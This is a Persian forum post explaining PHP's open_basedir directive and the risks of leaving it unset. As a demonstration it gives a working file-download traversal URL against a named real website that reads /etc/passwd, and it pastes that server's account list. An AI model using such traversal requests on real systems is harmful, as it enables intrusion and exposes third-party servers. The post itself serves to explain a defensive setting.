اطلاعیه

بستن
No announcement yet.

Open base_dir چیست ؟

بستن
X
 
  • فیلتر کردن
  • زمان
  • نمایش
Clear All
پست های جدید

    Open base_dir چیست ؟

    چند وقت پیش واسم سوال شد این open Base_Dire چیه
    این مقاله ای که الان میزارم خلاصه چند تا سایت و مقاله فارسی و انگلیسی هستش.
    امیدوارم مفید واقع بشه.


    این خاصیت در php این امکان را فراهم می آورد تا فایل هایی که توسط php باز می شوند را محدود کنید این diretive تحت تاثیر safe mode نیست و روشن یا خاموش بودن آن تاثیری بر عملکرد این directive ندارد.
    هنگامی که یک برنامه تلاش می کندیک فایل را باز کند موقعیت فایل در ساختار درختی بررسی می شود. اگر فایل در خارج از ساختار درختی مجاز باشید php آن را باز نمی کند . در این حالت لینک های پیوندی هم بررسی می شوند لذا این محدودیت در symlink هم اعمال می شود.
    از خطرات خاموش بودن Open_basedir این هستش که هکر می تونه با آپلود کردن یک شل اسکریپت در سایت شما به تمامی دایرکتوری های سرور جا به جا شده و بتواند فایل ها را مدیریت کند.

    مثلا توی این سرور بعلت تنظیم نشدن open base_dir براحتی میشه توسط php به فایل passwd دست پیدا کرد و به صورت remote پسورد ها رو کرک کرد.
    کد PHP:
    http://www.artbullet.com/forcedownload.php?file=/etc/passwd 
    کد PHP:
    root:x:0:0:User root:/root:/bin/bash bin:x:1:1:base-user:/bin
    daemon:x:2:2:base-user:/sbin
    adm:x:3:4:base-user:/var/log
    sync:x:5:0:base-user:/sbin:/bin/sync 
    shutdown
    :x:6:0:base-user:/sbin:/sbin/shutdown 
    halt
    :x:7:0:base-user:/sbin:/sbin/halt 
    mail
    :x:8:12:base-user:/: 
    cron:x:13:13:base-user:/var/spool/cron:/bin/false 
    man
    :x:15:15:base-user:/usr/share/man:/bin/false 
    nobody
    :x:16:16:base-user:/: 
    portage:x:250:250:base-user:/var/tmp/portage:/bin/false 
    smmsp
    :x:22:22:base-user:/:/usr/sbin/nologin 
    sshd
    :x:21:21:base-user:/:/usr/sbin/nologin 
    oracle
    :x:1000:408:base-user:/:/usr/sbin/nologin 
    iqos
    :x:62:62:base-user:/usr/services/control/jboss:/bin/bash 
    alias
    :x:71:70:base-user:/usr/services/mail/qmail/alias:/usr/sbin/nologin 
    qmaild
    :x:72:70:base-user:/usr/services/mail/qmail:/usr/sbin/nologin 
    qmaill
    :x:73:70:base-user:/usr/services/mail/qmail:/usr/sbin/nologin 
    qmailp
    :x:74:70:base-user:/usr/services/mail/qmail:/usr/sbin/nologin 
    qmailq
    :x:75:71:base-user:/usr/services/mail/qmail:/usr/sbin/nologin 
    qmailr
    :x:76:71:base-user:/usr/services/mail/qmail:/usr/sbin/nologin 
    qmails
    :x:77:71:base-user:/usr/services/mail/qmail:/usr/sbin/nologin 
    vpopmail
    :x:78:72:base-user:/usr/services/mail/vpopmail:/usr/sbin/nologin 
    nscd
    :x:32:32:base-user:/dev/null:/usr/sbin/nologin 
    www
    :x:31:31:base-user:/:/usr/sbin/nologin 
    bind
    :x:50:50:base-user:/:/usr/sbin/nologin 
    ssmysql
    :x:40:40:base-user:/:/usr/sbin/nologin 
    mysql
    :x:80:80:base-user:/:/usr/sbin/nologin 
    mivamysql
    :x:41:41:base-user:/:/usr/sbin/nologin 
    mysshd
    :x:25:25:base-user:/:/usr/sbin/nologin 
    ntp
    :x:123:123:base-user:/var/lib/openntpd/chroot:/usr/sbin/nologin 
    ldap
    :x:124:124:base-user:/:/usr/sbin/nologin 
    clamav
    :x:85:85:base-user:/:/usr/sbin/nologin 
    spamass
    :x:86:86:base-user:/:/usr/sbin/nologin 
    qscan
    :x:87:87:base-user:/:/usr/sbin/nologin 
    milter
    :x:101:101:base-user:/dev/null:/usr/sbin/nologin 
    tcpdump
    :x:116:116:base-user:/dev/null:/usr/sbin/nologin 
    devlogs
    :x:1000:100:base-user:/home/devlogs:/bin/bash 
    techs
    :x:1001:100:base-user:/home/techs:/bin/bash 
    noc
    :x:1002:100:base-user:/home/noc:/bin/bash 
    taddm
    :x:224:100:User taddm:/home/taddm:/bin/bash 

    امنیت و پشتیبانی سرور های لینوکسی

درباره انجمن منطقه لینوکسی ها

انجمن منطقه لینوکسی ها با هدف ارتقاء سطح علمی کاربران در سطح جهانی و همچنین کمک به بالا بردن سطح علمی عمومی در زمینه های تخصصی فوق پایه گذاری شده است. انجمن منطقه لینوکسی ها از طریق کارشناسان و متخصصان پاسخگوی سوالات گوناگون کاربران مبتدی یا پیشرفته میباشد تا حد امکان تلاش شده که محیطی متنوع و کاربر پسند و به دور از هرگونه حاشیه جهت فعالیت کاربران در این انجمن ایجاد شود. لذا ما به صورت مستمر برای پیشرفت کمی و کیفی محتوی و اطلاعات انجمنمان میکوشیم که این برای ما ارزشمند و حائز اهمیت است. کلیه حقوق،اطلاعات و مقالات در این انجمن متعلق به سایت منطقه لینوکسی ها میباشد، و هرگونه نسخه برداری بدون ذکر منبع مورد پیگرد قانونی خواهد شد.

شبکه های اجتماعی

ایمیل مدیریت

Habili@linux-zone.org

در حال انجام ...
X